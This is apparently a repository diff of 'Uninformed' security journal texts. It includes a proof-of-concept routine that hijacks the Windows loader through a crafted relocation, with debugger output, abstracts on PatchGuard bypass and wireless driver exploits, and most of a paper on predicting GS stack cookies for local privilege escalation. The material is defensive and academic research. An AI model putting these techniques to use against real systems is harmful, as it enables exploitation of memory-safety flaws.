.text:00011000 55 8B EC 8B 45 09 D0 68 18 30 01 00 00 96 9C 20
.text:00011010 01 00 83 C4 08 C7 05 50
dumpbin.exe: N/A, dumpbin doesn't actually perform relocation fixups.
A.6) Hijacking the Dynamic Loader
Since the dynamic loader in previous tests proved to be capable of writing to
areas of memory external to the executable binary, it makes sense to test to
see if it's possible to hijack execution control. One method of approaching
this would be to have the dynamic loader apply a relocation to the return
address of the function used to process relocations. When the function
returns, it'll transfer control to whatever address the relocations have
caused it to point to. An example of this code for this test is shown below:
static VOID TestHijackLoader(
__in PPE_IMAGE Image,
__in PRELOC_FUZZ_CONTEXT FuzzContext)
{
PRELOCATION_BLOCK_CONTEXT Block = AllocateRelocationBlockContext(1);
PrependRelocationBlockContext(
FuzzContext,
Block);
//
// Set the RVA to the address of the return address on the stack taking into
// account the displacement.
//
Block->Rva = 0x0012fab0;
Block->Fixups[0] = (3 << 12) | 0;
}
When a binary is executed that contains this relocation block, the dynamic
loader ends up applying a relocation to the return address located at
0x13fab0. Obviously, this address may be subject to change quite frequently,
but as a means of illustrating a proof of concept it should be sufficient.
And, just as one would expect, the dynamic loader does indeed overwrite the
return address and make it possible to gain control of execution:
(c88.184): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0001400a ebx=00014008 ecx=0013fab0 edx=80010000 esi=00000001
edi=ffffffff eip=fc92e10b esp=0013fac8 ebp=0013fae4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
fc92e10b ?? ???
0:000> kv
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
0013fac4 00010000 00261f18 7ffdc000 80010000 0xfc92e10b
0013fae4 7c91e08c 00010000 00000000 00000000 image00010000
0013fb08 7c93ecd3 00010000 7c93f584 00000000 ntdll!LdrRelocateImage+0x1d (FPO: [Non-Fpo])
0013fc94 7c921639 0013fd30 7c900000 0013fce0 ntdll!LdrpInitializeProcess+0xea0 (FPO: [Non-Fpo])
0013fd1c 7c90eac7 0013fd30 7c900000 00000000 ntdll!_LdrpInitialize+0x183 (FPO: [Non-Fpo])
00000000 00000000 00000000 00000000 00000000 ntdll!KiUserApcDispatcher+0x7
Bibliography
[1] Carrera, Ero. Packer Tracing.
http://nzight.blogspot.com/2006/06/packer-tracing.html;
accessed Dec 15, 2006.
[2] Szor, Peter. Advanced Code Evolution Techniques and Computer Virus Generator Kits.
http://www.informit.com/articles/article.asp?p=366890&seqNum=3&rl=1;
accessed Jan 8, 2007.
[3] Szor, Peter. Tricky Relocations.
http://peterszor.com/resurrel.pdf;
accessed Jan 8, 2007.

1570
uninformed/6.3.txt Normal file

File diff suppressed because it is too large Load Diff

17
uninformed/6.txt Normal file
View File

@ -0,0 +1,17 @@
Engineering in Reverse
Subverting PatchGuard Version 2
Skywing
Windows Vista x64 and recently hotfixed versions of the Windows Server 2003 x64 kernel contain an updated version of Microsoft's kernel-mode patch prevention technology known as PatchGuard. This new version of PatchGuard improves on the previous version in several ways, primarily dealing with attempts to increase the difficulty of bypassing PatchGuard from the perspective of an independent software vendor (ISV) deploying a driver that patches the kernel. The feature-set of PatchGuard version 2 is otherwise quite similar to PatchGuard version 1; the SSDT, IDT/GDT, various MSRs, and several kernel global function pointer variables (as well as kernel code) are guarded against unauthorized modification. This paper proposes several methods that can be used to bypass PatchGuard version 2 completely. Potential solutions to these bypass techniques are also suggested. Additionally, this paper describes a mechanism by which PatchGuard version 2 can be subverted to run custom code in place of PatchGuard's system integrity checking code, all while leaving no traces of any kernel patching or custom kernel drivers loaded in the system after PatchGuard has been subverted. This is particularly interesting from the perspective of using PatchGuard's defenses to hide kernel mode code, a goal that is (in many respects) completely contrary to what PatchGuard is designed to do.
pdf | txt | code.tgz | html
Locreate: An Anagram for Relocate
skape
This paper presents a proof of concept executable packer that does not use any custom code to unpack binaries at execution time. This is different from typical packers which generally rely on packed executables containing code that is used to perform the inverse of the packing operation at runtime. Instead of depending on custom code, the technique described in this paper uses documented behavior of the dynamic loader as a mechanism for performing the unpacking operation. This difference can make binaries packed using this technique more difficult to signature and analyze, but only when presented to an untrained eye. The description of this technique is meant to be an example of a fun thought exercise and not as some sort of revolutionary packer. In fact, it's been used in the virus world many years prior to this paper.
pdf | txt | code.tgz | html
Exploitation Technology
Exploiting 802.11 Wireless Driver Vulnerabilities on Windows
Johnny Cache, H D Moore, skape
This paper describes the process of identifying and exploiting 802.11 wireless device driver vulnerabilities on Windows. This process is described in terms of two steps: pre-exploitation and exploitation. The pre-exploitation step provides a basic introduction to the 802.11 protocol along with a description of the tools and libraries the authors used to create a basic 802.11 protocol fuzzer. The exploitation step describes the common elements of an 802.11 wireless device driver exploit. These elements include things like the underlying payload architecture that is used when executing arbitrary code in kernel-mode on Windows, how this payload architecture has been integrated into the 3.0 version of the Metasploit Framework, and the interface that the Metasploit Framework exposes to make developing 802.11 wireless device driver exploits easy. Finally, three separate real world wireless device driver vulnerabilities are used as case studies to illustrate the application of this process. It is hoped that the description and illustration of this process can be used to show that kernel-mode vulnerabilities can be just as dangerous and just as easy to exploit as user-mode vulnerabilities. In so doing, awareness of the need for more robust kernel-mode exploit prevention technology can be raised.
pdf | txt | code.tgz | html

958
uninformed/7.1.txt Normal file
View File

@ -0,0 +1,958 @@
Reducing the Effective Entropy of GS Cookies
skape
mmiller@hick.org
3/2007
1) Foreword
Abstract: This paper describes a technique that can be used to reduce the
effective entropy in a given GS cookie by roughly 15 bits. This reduction is
made possible because GS uses a number of weak entropy sources that can, with
varying degrees of accuracy, be calculated by an attacker. It is important to
note, however, that the ability to calculate the values of these sources for
an arbitrary cookie currently relies on an attacker having local access to the
machine, such as through the local console or through terminal services. This
effectively limits the use of this technique to stack-based local privilege
escalation vulnerabilities. In addition to the general entropy reduction
technique, this paper discusses the amount of effective entropy that exists in
services that automatically start during system boot. It is hypothesized that
these services may have more predictable states of entropy due to the relative
consistency of the boot process. While the techniques described in this paper
do not illustrate a complete break of GS, any inherent weakness can have
disastrous consequences given that GS is a static, compile-time security
solution. It is not possible to simply distribute a patch. Instead,
applications must be recompiled to take advantage of any security
improvements. In that vein, the paper proposes some solutions that could
be applied to address the problems that are outlined.
Thanks: Aaron Portnoy for lending some hardware for sample collection.
Johnny Cache and Richard Johnson for discussions and suggestions.
2) Introduction
Stack-based buffer overflows are generally regarded as one of the most common
and easiest to exploit classes of software vulnerabilities. This prevalence
has lead to the implementation of many security solutions that attempt to
prevent the exploitation of these vulnerabilities. Some of these solutions
include StackGuard[1], ProPolice[2], and Microsoft's /GS compiler switch[5]. The
shared premise of these solutions involves the placement of a cookie, or
canary, between the buffers stored in a stack frame and the stack frame's
return address. The cookie that is placed on the stack is used as a marker to
detect if a buffer overflow has occurred prior to allowing a function to
return. This simple concept can be very effective at making the exploitation
of stack-based buffer overflows unreliable.
The cookie-based approach to detecting stack-based buffer overflows involves
three general steps. First, a cookie that will be inserted into a function's
stack frame must be generated. The approaches taken to generate cookies vary
quite substantially, some having more implications than others. Once a cookie
has been generated, it must be pushed onto the stack in the context of a
function's prologue at execution time. This ensures that the cookie is placed
before the return address (and perhaps other values) on the stack. Finally, a
check must be added to a function's epilogue to make sure that the cookie that
was stored in the stack frame is the value that it was initialized to in the
function prologue. If an overflow of a stack-based buffer occurs, then it's
likely that it will have overwritten the cookie stored after the buffer. When
a mismatch is detected, steps can be taken to securely terminate the process
in a way that will prevent exploitation.
The security of a cookie-based solution hinges on the fact that an attacker
doesn't know, or is unable to generate, the cookie that is stored in a stack
frame. Since it's impossible to guarantee in all situations that an attacker
won't be able to generate the bytes that compose the value of a cookie, it
really all boils down to the cookie being kept secret. If the cookie is not
kept secret, then the presence of a cookie will provide no protection when it
comes to exploiting a stack-based buffer overflow vulnerability.
Additionally, if an attacker can trigger an exploitable condition before the
cookie is checked, then it stands that the cookie will provide no protection.
One example of this might include overwriting a function pointer on the stack
that is called prior to returning from the function.
While the StackGuard and ProPolice implementations are interesting and useful,
the author feels that no implementation is more critical than the one provided
by Microsoft. The reason for this is the simple fact that the vast majority
of all desktops, and a non-trivial number of servers, run applications
compiled with Microsoft's Visual C compiler. Any one weakness found in the
Microsoft's implementation could mean that a large number of applications are
no longer protected against stack-based buffer overflows. In fact, there has
been previous research that has pointed out flaws or limitations in
Microsoft's implementation. For example, David Litchfield pointed out that
even though stack cookies are present, it may still be possible to overwrite
exception registration records on the stack which may be called before the
function actually returns. This discovery was one of the reasons that
Microsoft later introduced SafeSEH (which had its own set of issues)[6].
Similarly, Chris Ren et al from Cigital pointed out the potential implications
of a function pointer being used in the path of the error handler for the case
of a GS cookie mismatch occurring[9]. While not directly related to a particular
flaw or limitation in GS, eEye has described some of the problems that come
when secrets get leaked[3].
Even though these issues and limitations have existed, Microsoft's GS
implementation at the time of this writing is considered by most to be secure.
While this paper will not present a complete break of Microsoft's GS
implementation, it will describe certain quirks and scenarios that may make it
possible to reduce the amount of effective entropy that exists in the cookies
that are generated. As with cryptography, any reduction of the entropy that
exists in the GS cookie effectively makes it so there are fewer unknown
portions of the cookie. This makes the cookie easier to guess by reducing the
total number of possibilities. Beyond this, it is expected that additional
research may find ways to further reduce the amount of entropy beyond that
described in this document. One critical point that must be made is that
since the current GS implementation is statically linked when binaries are
compiled, any flaw that is found in the implementation will require a
recompilation of all binaries affected by it. To help limit the scope, only
the 32-bit version of GS will be analyzed, though it is thought that similar
attacks may exist on the 64-bit version as well.
The structure of this paper is as follows. In chapter 3, a brief description
of the Microsoft's current GS implementation will be given. Chapter 4 will
describe some techniques that may be used to attack this implementation.
Chapter 5 will provide experimental results from using the attacks that are
described in chapter . Chapter 6 will discuss steps that could be taken to
improve the current GS implementation. Finally, chapter 7 will discuss some
areas where future work could be applied to further improve on the techniques
described in this document.
3) Implementation
As was mentioned in the introduction, security solutions that are designed to
protect against stack-based buffer overflows through the use of cookies tend
to involve three distinct steps: cookie generation, prologue modifications,
and epilogue modifications. Microsoft's GS implementation is no different.
This chapter will describe each of these three steps independent of one
another to paint a picture for how GS operates.
3.1) Cookie Generation
Microsoft chose to have the GS implementation generate an image file-specific
cookie. This means that each image file (executable or DLL) will have their
own unique cookie. When used in conjunction with a stack frame, a function
will insert its image file-specific cookie into the stack frame. This will be
covered in more detail in the next section. The actual approach taken to
generate an image file's cookie lives in a compiler inserted routine called
__security_init_cookie. This routine is placed prior to the call to the image
file's actual entry point routine and therefore is one of the first things
executed. By placing it at this point, all of the image file's code will be
protected by the GS cookie.
The guts of the __security_init_cookie routine are actually the most critical part
to understand. At a high-level, this routine will take an XOR'd combination
of the current system time, process identifier, thread identifier, tick count,
and performance counter. The end result of XOR'ing these values together is
what ends up being the image file's security cookie. To understand how this
actually works in more detail, consider the following disassembly from an
application compiled with version 14.00.50727.42 of Microsoft's compiler.
Going straight to the disassembly is the best way to concretely understand the
implementation, especially if one is in search of weaknesses.
Like all functions, the __security_init_cookie function starts with a prologue.
It allocates storage for some local variables and initializes some of them to
zero. It also initializes some registers, specifically edi and ebx which will
be used later on.
.text:00403D58 push ebp
.text:00403D59 mov ebp, esp
.text:00403D5B sub esp, 10h
.text:00403D5E mov eax, __security_cookie
.text:00403D63 and [ebp+SystemTimeAsFileTime.dwLowDateTime], 0
.text:00403D67 and [ebp+SystemTimeAsFileTime.dwHighDateTime], 0
.text:00403D6B push ebx
.text:00403D6C push edi
.text:00403D6D mov edi, 0BB40E64Eh
.text:00403D72 cmp eax, edi
.text:00403D74 mov ebx, 0FFFF0000h
As part of the end of the code above, a comparison between the current
security cookie and a constant 0xbb40e64e is made. Before __security_init_cookie
is called, the global securitycookie is initialized to 0xbb40e64e. The
constant comparison is used to see if the GS cookie has already been
initialized. If the current cookie is equal to the constant, or the high
order two bytes of the current cookie are zero, then a new cookie is
generated. Otherwise, the complement of the current cookie is calculated and
cookie generation is skipped.
.text:00403D79 jz short loc_403D88
.text:00403D7B test eax, ebx
.text:00403D7D jz short loc_403D88
.text:00403D7F not eax
.text:00403D81 mov __security_cookie_complement, eax
.text:00403D86 jmp short loc_403DE8
To generate a new cookie, the function starts by querying the current system
time using GetSystemTimeAsFileTime. The system time as represented by Windows
is a 64-bit integer that measures the system time down to a granularity of 100
nanoseconds. The high order 32-bit integer and the low order 32-bit integer
are XOR'd together to produce the first component of the cookie. Following
that, the current process identifier is queried using GetCurrentProcessId and
then XOR'd as the second component of the cookie. The current thread
identifier is then queried using GetCurrentThreadId and then XOR'd as the
third component of the cookie. The current tick count is queried using
GetTickCount and then XOR'd as the fourth component of the cookie. Finally,
the current performance counter value is queried using
QueryPerformanceCounter. Like system time, this value is also a 64-bit
integer, and its high order 32-bit integer and low order 32-bit integer are
XOR'd as the fifth component of the cookie. Once these XOR operations have
completed, a comparison is made between the newly generated cookie value and
the constant 0xbb40e64e. If the new cookie is not equal to the constant
value, then a second check is made to make sure that the high order two bytes
of the cookie are non-zero. If they are zero, then a 10 bit left shift of the
cookie is performed in order to seed the high order bytes.
.text:00403D89 lea eax, [ebp+SystemTimeAsFileTime]
.text:00403D8C push eax
.text:00403D8D call ds:__imp__GetSystemTimeAsFileTime@4
.text:00403D93 mov esi, [ebp+SystemTimeAsFileTime.dwHighDateTime]
.text:00403D96 xor esi, [ebp+SystemTimeAsFileTime.dwLowDateTime]
.text:00403D99 call ds:__imp__GetCurrentProcessId@0
.text:00403D9F xor esi, eax
.text:00403DA1 call ds:__imp__GetCurrentThreadId@0
.text:00403DA7 xor esi, eax
.text:00403DA9 call ds:__imp__GetTickCount@0
.text:00403DAF xor esi, eax
.text:00403DB1 lea eax, [ebp+PerformanceCount]
.text:00403DB4 push eax
.text:00403DB5 call ds:__imp__QueryPerformanceCounter@4
.text:00403DBB mov eax, dword ptr [ebp+PerformanceCount+4]
.text:00403DBE xor eax, dword ptr [ebp+PerformanceCount]
.text:00403DC1 xor esi, eax
.text:00403DC3 cmp esi, edi
.text:00403DC5 jnz short loc_403DCE
...
.text:00403DCE loc_403DCE:
.text:00403DCE test esi, ebx
.text:00403DD0 jnz short loc_403DD9
.text:00403DD2 mov eax, esi
.text:00403DD4 shl eax, 10h
.text:00403DD7 or esi, eax
Finally, when a valid cookie is generated, it's stored in the image file's
securitycookie. The bit-wise complement of the cookie is also stored in
securitycookiecomplement. The reason for the existence of the complement will
be described later.
.text:00403DD9 mov __security_cookie, esi
.text:00403DDF not esi
.text:00403DE1 mov __security_cookie_complement, esi
.text:00403DE7 pop esi
.text:00403DE8 pop edi
.text:00403DE9 pop ebx
.text:00403DEA leave
.text:00403DEB retn
In simpler terms, the meat of the cookie generation can basically be
summarized through the following pseudo code:
Cookie = SystemTimeHigh
Cookie ^= SystemTimeLow
Cookie ^= ProcessId
Cookie ^= ThreadId
Cookie ^= TickCount
Cookie ^= PerformanceCounterHigh
Cookie ^= PerformanceCounterLow
3.2) Prologue Modifications
In order to make use of the generated cookie, functions must be modified to
insert it into the stack frame at the time that they are called. This does
add some overhead to the call time associated with a function, but its overall
effect is linear with respect to a single invocation. The actual
modifications that are made to a function's prologue typically involve just
three instructions. The cookie that was generated for the image file is XOR'd
with the current value of the frame pointer. This value is then placed in the
current stack frame at a precisely chosen location by the compiler.
.text:0040214B mov eax, __security_cookie
.text:00402150 xor eax, ebp
.text:00402152 mov [ebp+2A8h+var_4], eax
It should be noted that Microsoft has taken great care to refine the way a
stack frame is laid out in the presence of GS. Locally defined pointers,
including function pointers, are placed before statically sized buffers in the
stack frame. Additionally, dangerous input parameters passed to the function,
such as pointers or structures that contain pointers, will have local copies
made that are positioned before statically sized local buffers. The local
copies of these parameters are used instead of those originally passed to the
function. These two changes go a long way toward helping to prevent other
scenarios in which stack-based buffer overflows might be exploited.
3.3) Epilogue Modifications
When a function returns, it must check to make sure that the cookie that was
stored on the stack has not been tampered with. To accomplish this, the
compiler inserts the following instructions into a function's prologue:
.text:00402223 mov ecx, [ebp+2A8h+var_4]
.text:00402229 xor ecx, ebp
.text:0040222B pop esi
.text:0040222C call __security_check_cookie
The value of the cookie that was stored on the stack is moved into ecx and
then XOR'd with the current frame pointer to get it back to the expected
value. Following that, a call is made to securitycheckcookie where the stack
frame's cookie value is passed in the ecx register. The securitycheckcookie
routine is very short and sweet. The passed in cookie value is compared with
the image file's global cookie. If they don't match, reportgsfailure is
called and the process eventually terminates. This is what one would expect
in the case of a buffer overflow scenario. However, if they do match, the
routine simply returns, allowing the calling function to proceed with
execution and cleanup.
.text:0040634B cmp ecx, __security_cookie
.text:00406351 jnz short loc_406355
.text:00406353 rep retn
.text:00406355 loc_406355:
.text:00406355 jmp __report_gsfailure
4) Attacking GS
At the time of this writing, all publicly disclosed attacks against GS that
the author is aware of have relied on getting control of execution before the
cookie is checked or by finding some way to leak the value of the cookie back
to the attacker. Both of these styles of attack are of great interest and
value, but the focus of this paper will be on a different method of attacking
GS. Specifically, this chapter will outline techniques that may be used to
make it easier to guess the value an image file's GS cookie. Two techniques
will be described. The first technique will describe methods for calculating
the values that were used as entropy sources when the cookie was generated.
These calculations are possible in situations where an attacker has local
access to the machine, such as through the console or through terminal
services. The second technique describes the general concept of predictable
ranges of some values that are used in the context of boot start services,
such as lsass.exe. This predictability may make the guessing of a GS cookie
more feasible in both local and remote scenarios.
4.1) Calculating Entropy Sources
The sources used to generate the GS cookie for a given image file are constant
and well-known. They include the current system time, process identifier,
thread identifier, tick count, and performance counter. In light of that
fact, it only makes sense to investigate the amount of effective entropy each
source adds to the cookie. Since it's a requirement that the cookie produced
be secret, the ability to guess a value used in the generation of the cookie
will allow it to be canceled out of the equation. This is true due to the
simple fact that each of the values used to generate the cookie is XOR'd with
each other value (XOR is a commutative operation). The ability to guess
multiple values can make it possible to seriously impact the overall integrity
of the cookie.
While the sources used in the generation of the cookie have long been regarded
as satisfactory, the author has found that the majority of the sources
actually contribute little to no value toward the overall entropy of the
cookie. However, this is currently only true if an attacker has local access
to the machine. Being able to know a GS cookie that was used in a privileged
process would make it possible to exploit a local privilege escalation
vulnerability, for example. There may be some circumstances where the
techniques described in this section could be applied remotely, but for the
purpose of this document, only the local scenario will be considered. The
following subsections will outline methods that can be used to calculate or
deterministically find the specific values that were used when a cookie was
being generated in a particular process context. As a result of this
analysis, it's become clear that the only particular variable source of true
entropy for the GS cookie is the low 17 bits of the performance counter. All
other sources can be reliably calculated, with some margin of error.
For the following subsections, a modified executable named vulnapp.exe was
used to extract the information that was used at the time that a process
executable's GS cookie was generated. In particular, __security_init_cookie was
modified to jump into a function that saves the information used to generate
the cookie. The implementation of this function is shown below for those who
are curious:
//
// The FramePointer is the value of EBP in the context of the
// __security_init_cookie routine. The cookie is the actual,
// resultant cookie value. GSContext is a global array.
//
VOID DumpInformation(
PULONG FramePointer,
ULONG Cookie)
{
GSContext[0] = FramePointer[-3];
GSContext[1] = FramePointer[-4];
GSContext[2] = FramePointer[-1];
GSContext[3] = FramePointer[-2];
GSContext[4] = GetCurrentProcessId();
GSContext[5] = GetCurrentThreadId();
GSContext[6] = GetTickCount();
GSContext[7] = Cookie;
}
4.1.1) System Time
System time is a value that one might regard as challenging to recover. After
all, it seems impossible to get the 100 nanosecond granularity of the system
time that was retrieved when a cookie was being generated. Quite the
contrary, actually. There are a few key points that go into being able to
recover the system time. First, it's a fact that even though the system time
measures granularity in terms of 100 nanosecond intervals, it's really only
updated every 15.625 milliseconds (or 10.1 milliseconds for more modern CPUs).
To many, 15.625 may seem like an odd number, but for those familiar with the
Windows thread scheduler, it can be recognized as the period of the timer
interrupt. For that reason, the current system time is only updated as a
result of the timer interrupt firing. This fact means that the alignment of
the system time that is used when a cookie is generated is known.
Of more interest, though, is the relationship between the system time value
and the creation time value associated with a process or its initial thread.
Since the minimum granularity of the system time is 15.6 or 10.1 milliseconds,
it follows that the granularity of the thread creation time will be the same.
In terms of modern CPUs, 15.6 milliseconds is an eternity and is plenty long
for the processor to execute all instructions from the creation of the thread
to the generation of the security cookie. This fact means that it's
possible to assume that the creation time of a process or thread is the
same as the system time that was used when the cookie was generated. This
assumption doesn't always work, though, and there are indeed cases where
the creation time will not equal the system time that was used. These
situations are usually a result of the thread that creates the cookie not
being immediately scheduled.
Even if this is the case, it would be necessary to be able to obtain the
creation time of an arbitrary process or thread. On the surface, this would
seem impossible because task manager prevents a non-privileged user from
getting the start time of a privileged process.
This is all a deception, though, because there does exist functionality that
is exposed to non-privileged users that can be used to get this information.
One way of getting it is through the use of the native API routine
NtQuerySystemInformation. In this case, the
SystemProcessesAndThreadsInformation system information class is used to query
information about all of the running processes on the system. This
information includes the process name, process creation time, and the creation
time for each thread in each process. While this information class has been
removed in Windows Vista, there are still potential ways of obtaining the
creation time information. For example, an attacker could simply crash the
vulnerable service once (assuming it's not a critical service) and then wait
for it to respawn. Once it respawns, the creation time can be inferred based
on the restart delay of the service. Granted, service restarts are limited
to three times per day in Vista, but crashing it once should cause no major
issues.
Using NtQuerySystemInformation, it's possible to collect some data that can be
used to determine the likelihood that the creation time of a thread will be
equal to the system time that was used when a GS cookie was generated. To
test this, the author used the modified vulnapp.exe executable to extract the
system time at the time that the cookie was generated. Following that, a
separate program was used to collect the creation time information of the
process in question using the native API. The initial thread's creation time
was then compared with the system time to see if they were equal. The
creation time and system time were often equal in a sample of 742 cookies.
Obviously, the data set describing differences is only relevant to a
particular system load. If there are many threads waiting to run during the
time that a process is executed, then it is unlikely that the system time will
equal the process creation time. In a desktop environment, it's probably safe
to assume that the thread will run immediately, but more conclusive evidence
may be necessary.
Given these facts, it is apparent that the complete 64-bit system time value
can be recovered more often than not with a great degree of accuracy just by
simply assuming that thread creation time is the same as the system time
value.
4.1.2) Process and Thread Identifier
The process and thread identifier are arguably the worst sources of entropy
for the GS cookie, at least in the context of a local attack. The two high
order bytes of the process and thread identifiers are almost always zero.
This means they have absolutely no effect on the high order entropy.
Additionally, the process and thread identifier can be determined with 100
percent accuracy in a local context using the same API described in the
previous section on getting the system time. This involves making use of
the NtQuerySystemInformation native API with the
SystemProcessesAndThreadsInformation system information class to get the
process identifier and thread identifier associated with a given process
executable.
The end result, obviously, is that the process and thread identifier can be
determined with great accuracy. The one exception to this rule would be
Windows Vista, but, as was mentioned before, alternative methods of obtaining
the process and thread identifier may exist.
4.1.3) Tick Count
The tick count is, for all intents and purposes, simply another measure of
time. When the GetTickCount API routine is called, the number of ticks is
multiplied by the tick count multiplier. This multiplication effectively
translates the number of ticks to the number of milliseconds that the system
has been up. If one can safely assume that the that the system time used to
generate the cookie was the same as the thread creation time, then the tick
count at the time that the cookie was generated can simply be calculated using
the thread creation time. The creation time isn't enough, though. Since the
GetTickCount value measures the number of milliseconds that have occurred
since boot, the actual uptime of the system has to be determined.
To determine the system uptime, a non-privileged user can again make use of
the NtQuerySystemInformation native API, this time with the
SystemTimeOfDayInformation system information class. This query returns the
time that the system was booted as a 64-bit integer measured in 100 nanosecond
intervals, just like the thread creation time. To calculate the system uptime
in milliseconds, it's as simple as subtracting the boot time from the creation
time and then dividing by 10000 to convert from 100 nanosecond intervals to 1
millisecond intervals:
EstTickCount = (CreationTime - BootTime) / 10000
Some experimentation shows that this calculation is pretty accurate, but some
quantity is lost in translation. From what the author has observed, a
constant scaling factor of 0x4e, or 78 milliseconds, needs to be added to the
result of this calculation. The source of this constant is as of yet unknown,
but it appears to be a required constant. This results in the actual equation
being:
EstTickCount = [(CreationTime - BootTime) / 10000] + 78
The end result is that the tick count can be calculated with a great degree of
accuracy. If the system time calculation is off, then that will directly
affect the calculation of the tick count.
4.1.4) Performance Counter
Of the four entropy sources discussed so far, the performance counter is the
only one that really presents a challenge. The purpose of the performance
counter is to describe the total number of cycles that have executed. On the
outside, the performance counter would seem impossible to reliably determine.
After all, how could one possibly determine the precise number of cycles that
had occurred as a cookie was being generated? The answer, of course, comes
down to the fact that the performance counter itself is, for all intents and
purposes, just another measure of time. Windows provides two interesting
user-mode APIs that deal with the performance counter. The first,
QueryPerformanceCounter, is used to ask the kernel to read the current value
of the performance counter[8]. The result of this query is stored in the 64-bit
output parameter that the caller provides. The second API is
QueryPerformanceFrequency. This routine is interesting because it returns a
value that describes the amount that the performance counter will change in
one second[7]. Documentation indicates that the frequency cannot change while
the system is booted.
Using the existing knowledge about the uptime of the system and the
calculation that can be performed to convert between the performance counter
value and seconds, it is possible to fairly accurately guess what the
performance counter was at the time that the cookie was generated. Granted,
this method is more fuzzy than the previously described methods, as
experimental results have shown a large degree of fluctuation in the lower 17
bits. Those results will be discussed in more detail in chapter . The actual
equation that can be used to generate the estimated performance counter is to
take the uptime, as measured in 100 nanosecond intervals, and multiply it by
the performance frequency divided by 10000000, which converts the frequency
from a measure of 1 second to 100 nanosecond:
EstPerfCounter = UpTime x (PerfFreq / 10000000)
In a fashion similar to tick count, a constant scaling factor of -165000 was
determined through experimentation. This seems to produce more accurate
results in some of the 24 low bits. Based on this calculation, it's possible
to accurately determine the entire 32-bit high order integer and the first 15
bits of the 32-bit low order integer. Of course, if the system time estimate
is wrong, then that directly effects this calculation.
4.1.5) Frame Pointer
While the frame pointer does not influence an image file's global cookie, it
does influence a stack frame's version of the cookie. For that reason, the
frame pointer must be considered as an overall contributor to the effective
entropy of the cookie. With the exception of Windows Vista, the frame pointer
should be a deterministic value that could be deduced at the time that a
vulnerability is triggered. As such, the frame pointer should be considered a
known value for the majority of stack-based buffer overflows. Granted, in
multi-threaded applications, it may be more challenging to accurately guess
the value of the frame pointer.
In the Windows Vista environment, the compile-time GS implementation gets a
boost in security due to the introduction of ASLR. This helps to ensure that
the frame pointer is actually an unknown quantity. However, it doesn't
introduce equal entropy in all bits. In particular, octet 4, and potentially
octet 3, may have predictable values due to the way that the randomization is
applied to dynamic memory allocations. In order to prevent fragmentation of
the address space, Vista's ASLR implementation attempts to ensure that stack
regions are still allocated low in the address space. This has the side
effect of ensuring that a non-trivial number of bits in the frame pointer will
be predictable. Additionally, while Vista's ASLR implementation makes an
effort to shift the lower bits of the stack pointer, there may still be some
bits that are always predictable in octet 2.
4.2) Predictability of Entropy Sources in Boot Start Services
A second attack that could be used against GS involves attacking services that
start early on when the system is booted. These services may experience more
predictable states of entropy due to the fact that the amount of time it takes
to boot up and the order in which tasks are performed is fairly, though not
entirely, consistent. This insight may make it possible to estimate the value
of entropy sources remotely.
To better understand this type of attack, the author collected 742 samples
that were taken from a custom service that was set to automatically start
during boot on a Windows XP SP2 installation. This service was simply
designed to log the state used at the time that the GS cookie was being
generated. While a sampling of the GS cookie state applied to lsass.exe would
have been more ideal, it wasn't worth the headache of having to patch a
critical system service. Perhaps the reader may find it interesting to
collect this data on their own. From the samples that were taken, the
following diagrams show the likelihood of each individual bit being set for
each of the different entropy sources.
Overall, there are a number of predictable bits in things like the high
32-bits of both the system time and the performance counter, the process
identifier, the thread identifier, and the tick count. The sources that are
largely unpredictable are the low 32-bits of the system time and the
performance counter. However, if it were possible to come up with a way to
discover the boot time (or uptime) of the system remotely, it might be
possible to infer a good portion of the low 32-bits of the system time. This
would then directly impact the ability to estimate things like the tick count
and performance counters.
5) Experimental Results
This chapter describes some of the initial results that were collected using a
utility developed by the author named gencookie.exe. This utility attempts to
calculate the value of the cookie that was generated for the executable image
associated with an arbitrary process, such as lsass.exe. While the results of
this utility were limited to attempting to calculate the cookie of a process'
executable, the techniques described in previous chapters are nonetheless
applicable to the cookies generated in the context of dependent DLLs. The
results described in this chapter illustrate the tool's ability to accurately
obtain specific bits within the different components that compose the cookie,
including specific bits of the cookie itself. This helps to paint a picture
of the amount of true entropy that is reduced through the techniques described
in this document.
The data set that was used to calculate the overall results included 5001
samples which were collected from a single machine. The samples were
collected through a few simple steps. First, a program called vulnapp.exe
that was compiled with /GS was modified to have its __security_init_cookie routine
save information about the cookie that was generated and the values that
contributed to its generation. Following that, the gencookie.exe utility was
launched against the running process in an attempt to calculate vulnapp.exe's
GS cookie. A comparison between the expected and actual value of each
component was then saved. These steps were repeated 5001 times. The author
would be interested in hearing about independent validation of the findings
presented in this chapter.
The following sections describe the bit-level predictability of each of the
components that are used to generate the GS cookie, including the overall
predictability of the bits of the GS cookie itself.
5.1) System Time
The system time component was highly predictable. The high 32-bit bits of the
system time were predicted with 100 percent accuracy. The low 32-bit bits on
the other hand were predicted with only 77 percent accuracy (3878 times). The
reason for this discrepancy has to do with the thread scheduling scenario
described in subsection . Even still, these results indicate that it is
likely that the entire system time value can be accurately calculated.
5.2) Process and Thread Identifier
The process and thread identifier were successfully calculated 100 percent of
the time using the approach outlined in section .
5.3) Tick Count
The tick count was accurately calculated 67 percent of the time (3396 times).
The reason for this lower rate of success is due in large part to the fact
that the tick count is calculated in relation to the estimated system time
value. As such, if an incorrect system time value is determined, the tick
count itself will be directly influenced. This should account for at least 23
percent of the inaccuracies judging from how often the system time was
inaccurately estimated. The remaining 10 percent of the inaccuracies is as of
yet undetermined, but it is most likely related to the an improper
interpretation of the constant scaling factor that is applied to the tick
count. In any case, it is expected that only a few bits are actually affected
in the remaining 10 percent of cases.
5.4) Performance Counter
The high 32-bits of the performance counter were successfully estimated 100
percent of the time. The low 32-bits, on the other hand, show the greatest
degree of volatility when compared to the other components. The high order 15
bits of the low 32-bits show a bias in terms of accuracy that is not a 50/50
split. The remaining 17 bits were all guessed correctly roughly 50 percent of
the time. This makes the low 17 bits the only truly effective source of
entropy in the performance counter since there is no bias shown in relation to
the estimated versus actual values. Indeed, this is not enough to prove that
there aren't observable patterns in the low 17 bits, but it is enough to show
that the gencookie.exe utility was not effective in estimating them. Figures
and show the percent accuracy for the high and low order 32-bits.
This discrepancy actually requires a more detailed explanation. In reality,
the estimates made by the gencookie.exe utility are actually not as far off as
one might think based on the percent accuracy of each bit as described in the
diagrams. Instead, the estimates are, on average, off by only 105,000. This
